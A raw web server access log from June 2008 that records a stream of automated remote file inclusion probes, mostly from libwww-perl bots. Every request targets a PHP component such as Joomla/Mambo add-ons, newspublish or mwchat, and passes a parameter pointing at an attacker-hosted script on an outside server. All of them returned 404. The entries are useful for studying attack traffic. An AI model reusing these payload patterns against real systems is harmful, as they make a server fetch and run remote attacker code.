189.19.255.240 - - [29/Jun/2008:19:18:52 -0600] "GET /index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:19:18:53 -0600] "GET /logs/access_log.20080420//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
69.62.196.11 - - [29/Jun/2008:19:18:53 -0600] "GET /logs/access_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
69.62.196.11 - - [29/Jun/2008:19:19:01 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
67.19.130.218 - - [29/Jun/2008:19:19:04 -0600] "GET /logs/access_log/index.php?pagina=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
67.19.130.218 - - [29/Jun/2008:19:19:04 -0600] "GET /index.php?pagina=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
67.19.130.218 - - [29/Jun/2008:19:19:04 -0600] "GET /logs/index.php?pagina=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
217.20.163.130 - - [29/Jun/2008:19:19:08 -0600] "GET /logs/error_log.20080413/akocomments.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:19:19:53 -0600] "GET /logs/access_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
189.19.255.240 - - [29/Jun/2008:19:20:29 -0600] "GET //trans/trans.php?trans=fr&page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
63.246.64.173 - - [29/Jun/2008:19:20:29 -0600] "GET /logs/access_log.20080330//include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.72.211.242 - - [29/Jun/2008:19:20:32 -0600] "GET /logs/access_log.20080615/index.php?path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
69.72.211.242 - - [29/Jun/2008:19:20:33 -0600] "GET /index.php?path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
69.72.211.242 - - [29/Jun/2008:19:20:33 -0600] "GET /logs/index.php?path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
63.246.64.173 - - [29/Jun/2008:19:20:40 -0600] "GET //include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
71.6.211.72 - - [29/Jun/2008:19:20:44 -0600] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.810"
71.6.211.72 - - [29/Jun/2008:19:20:45 -0600] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
59.126.172.166 - - [29/Jun/2008:19:21:02 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
63.246.64.173 - - [29/Jun/2008:19:21:06 -0600] "GET /logs/access_log//include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
8.2.208.2 - - [29/Jun/2008:19:21:33 -0600] "GET /logs/access_log.20080525//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
217.20.163.130 - - [29/Jun/2008:19:22:01 -0600] "GET /logs/error_log.20080420//newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
216.75.35.118 - - [29/Jun/2008:19:22:17 -0600] "GET /logs/error_log.20080511//header.php?tpl_pgb_moddir=http://www.delcorso.org/images/blank? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
216.75.35.118 - - [29/Jun/2008:19:22:17 -0600] "GET /logs//header.php?tpl_pgb_moddir=http://www.delcorso.org/images/blank? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.75.35.118 - - [29/Jun/2008:19:22:53 -0600] "GET /logs/error_log.20080406//header.php?tpl_pgb_moddir=http://www.delcorso.org/images/blank? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
67.19.130.218 - - [29/Jun/2008:19:23:12 -0600] "GET /logs/access_log/index.php?conteudo=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
67.19.130.218 - - [29/Jun/2008:19:23:12 -0600] "GET /index.php?conteudo=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
67.19.130.218 - - [29/Jun/2008:19:23:12 -0600] "GET /logs/index.php?conteudo=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
67.19.130.218 - - [29/Jun/2008:19:23:15 -0600] "GET /logs/access_log.20080511/index.php?conteudo=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 240 "-" "libwww-perl/5.810" 67.